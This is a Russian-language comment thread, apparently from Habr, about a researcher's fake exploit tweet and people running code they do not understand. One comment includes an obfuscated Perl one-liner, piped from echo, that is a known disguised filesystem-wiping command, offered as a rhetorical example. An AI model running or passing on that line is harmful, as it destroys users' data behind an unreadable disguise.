Pull to refresh

Comments 22

Я правильно понял что человек имеющий репутацию специалиста по уязвимостями или лица публикующего таковые воспользовался своим авторитетом, чтобы обмануть массу некомпетентных людей доверившихся его репутации?
чтобы обмануть массу компетентных людей доверившихся его репутации?

поправил

Думаю компетентных в подписчиках было меньшинство и они известны по именам, их и нужно проверять на то ретвитнули ли и с каким комментариями.

Уязвимость (в данном случае, по крайней мере) публиковал не автор, а упомянутая Алиса. Сам же автор оставил впечатление скорее "активно развлекающегося", чем с устоявшимся авторитетом. Хотя последователей в Twitter у него тоже действительно много.

Вы про эту уязвимость? (которая не уязвимость).
Алиса, по видимому, тоже не проч похайповать, выдав не уязвимость за уязвимость.
Тем не менее, сама Алиса не согласна, что это «не уязвимость», и ответила ребятам из NGINX вот так:

However I suggest you to double-check the statement regarding general exploitability of a classical buffer overflow with potentially remote-controlled input data, before my more aggressive colleagues step in. ;)
Оказалось, что IP также можно конвертировать в шестнадцатеричный формат.
«Оказалось», омг :) Помню в далёком 2001-м прочитал об этом на ресурсе NNM: https://bolknote.ru/all/2971/. Думал, что за столько лет это стало широко известно. :)
;) ;) Оказалось, что сия изначальная возможность прошлого века, стала ещё более хорошо забытой ;) ;)

А ещё в восьмеричной и даже десятичной.
Только серверу не нравится заголовок Host, подставляемый curl-ом, потому немного костылим:
curl 37285994 -HHost:H

С момента написания этой статьи твит notdan с поддельным эксплойтом (а если точнее, то весь его твиттер-аккаунт) перестал быть доступным для просмотра сторонним читателям (теперь только для «confirmed followers»).
понятное дело: чтобы их увидеть, люди выполняли код на своей машине

Патч Бармина?

А когда-то просто запускали все незнакомые exe-шники

Но сначала каждый exe проверяли антивирусом.

Вы из параллельной вселенной.
Всякие репаки иногда прямо пишут «отключите антивирус для установки игры» )

Когда-то запускаЛИ, проверяЛИ. Я из прошлого пишу ;)

UFO just landed and posted this here

А я думал эффект будет обратным — после появления новости найдут сразу несколько уязвимостей (по аналогии с олимпийскими рекордами, которые сначала недостижимы, а потом покоряются сразу нескольким людям после обнародования).

Ну да, стоит чудаку написать «ВИНДА/ЛИНУПС/ФРЯХА — ДЫРА», сразу же «находят несколько уязвимостей». Просто потому что так написали )
Вы случайно не из тех кто вешает на стену плакаты «денег/машин/всех благ» потому что «мысли материальны… даже если ничего не делать»? ))

PS: Если сказать людям выполнить echo
"test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
и они ее выполнят, это уязвимость?

Это вирусная реклама статей про восстановление файлов.

ИМХО статья о том, что «специалисты» (и их большинство) не проверяют то, что запускают и не пытаются разобраться в сути. Т.е. получается системы уязвимы в большей степени из-за человеческого фактора чем из-за технических недоработок. Ну и плюс все такие важные и прошаренные — подписаны на тематические ветки\твитер-аккаунты и прочее. Видел таких. Гордятся тем, что регулярно получают рассылки со всяких форумов и намекают на то, что это типа для технической элиты и простым смертным не понять о чем там пишут.
UFO just landed and posted this here
Sign up to leave a comment.